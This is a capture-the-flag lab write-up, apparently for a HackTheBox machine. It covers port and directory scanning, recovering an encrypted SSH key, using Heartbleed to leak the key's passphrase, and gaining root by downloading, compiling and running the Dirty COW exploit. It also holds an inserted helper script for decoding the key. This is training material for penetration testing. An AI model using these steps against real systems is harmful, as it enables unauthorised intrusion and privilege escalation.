root@Kali:~# nmap -sC -sS -sV -A -T4 10.10.10.79
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-24 08:08 CDT
Nmap scan report for 10.10.10.79
Host is up (0.056s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

DIRB Results:

---- Scanning URL: https://10.10.10.79/ ----
+ https://10.10.10.79/cgi-bin/ (CODE:403|SIZE:288)
+ https://10.10.10.79/decode (CODE:200|SIZE:552)
==> DIRECTORY: https://10.10.10.79/dev/
+ https://10.10.10.79/encode (CODE:200|SIZE:554)
+ https://10.10.10.79/index (CODE:200|SIZE:38)
+ https://10.10.10.79/index.php (CODE:200|SIZE:38)
+ https://10.10.10.79/server-status (CODE:403|SIZE:293)
---- Entering directory: https://10.10.10.79/dev/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.

In the dev directory, I found a text file and something called hype_key, which looks like a hex-encoded RSA key. I decoded it here: http://www.convertstring.com/EncodeDecode/HexDecode

To find a username, I tried the msf module apache_userdir_enum, but didn't get anything back. Since none of the usual usernames turned up, and given the name of the key, I assumed the username it belonged to was 'hype'.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
...
-----END RSA PRIVATE KEY-----

I also discovered this version is vulnerable to the well-known Heartbleed exploit!

https://sathisharthars.com/2014/06/10/exploit-heartbleed-openssl-vulnerability-using-kali-linux/

The msf heartbleed scan gives us $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== which looks like something base64 encoded.

Dirb told us there’s a decode page on this server.

Your input:

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

Your encoded input:

heartbleedbelievethehype

I saved the key on my local machine, then SSHed into the box.

The key file must have restrictive permissions (chmod 400 hype_key.txt), otherwise ssh refuses to use it.
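As an added example (not from the original post), this Python script ties the file-handling steps above together: hex-decode a recovered key such as hype_key, read the legacy PEM headers to see that it is passphrase-encrypted and with which cipher, base64-decode the string the Heartbleed scan returned, and check that the key file's mode is one ssh will accept. Only the PEM header lines and the base64 string come from the page; the key body is a constructed placeholder.

```python
import base64
import binascii
import re
import stat

# Constructed sample: a hex-encoded, passphrase-protected PEM key in the
# shape of hype_key. Header lines are the page's; the body is a placeholder.
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46\n"
    "\n"
    "QUJDREVGR0g=\n"  # placeholder body, not real key material
    "-----END RSA PRIVATE KEY-----\n"
)
SAMPLE_HEX = SAMPLE_PEM.encode().hex()
LEAKED_B64 = "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg=="  # value from the heartbleed scan


def unhex_if_needed(data: bytes) -> bytes:
    """Hex-decode the file when it is pure hex text, else return it unchanged."""
    text = data.decode("ascii", errors="ignore").strip()
    compact = "".join(text.split())
    if re.fullmatch(r"[0-9a-fA-F\s]+", text) and len(compact) % 2 == 0:
        return binascii.unhexlify(compact)
    return data


def pem_encryption(pem: bytes) -> dict:
    """Parse the legacy PEM encryption headers (Proc-Type / DEK-Info)."""
    info = {"encrypted": False, "cipher": None, "iv": None}
    m = re.search(rb"^DEK-Info:\s*([^,]+),([0-9A-Fa-f]+)", pem, re.M)
    if b"Proc-Type: 4,ENCRYPTED" in pem and m:
        info.update(encrypted=True, cipher=m.group(1).decode(), iv=m.group(2).decode())
    return info


def ssh_accepts_mode(mode: int) -> bool:
    """ssh rejects private keys readable by group or other; 0600 and 0400 pass."""
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


def decode_leak(b64: str) -> str:
    """Decode the base64 string recovered from process memory, dropping the newline."""
    return base64.b64decode(b64).decode().strip()


if __name__ == "__main__":
    pem = unhex_if_needed(SAMPLE_HEX.encode())
    print(pem_encryption(pem), ssh_accepts_mode(0o400), decode_leak(LEAKED_B64))
```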

The login banner also tells us, as soon as we log in, that this is an out-of-date release, which may be useful since that's a pretty old kernel. A quick Google search for Linux 3.2.0-23-generic exploits gets me this: https://github.com/SecWiki/linux-kernel-exploits/tree/master/2013/CVE-2013-2094, Kernel Dirty COW local root exploit Demonstration

wget --no-check-certificate 'https://www.exploit-db.com/download/40839' -O 'dirty.c'

gcc -pthread dirty.c -o dirty -lcrypt

./dirty

Enter new password: password

su firefart

The password is the new one entered above.

cd /root

cat root.txt
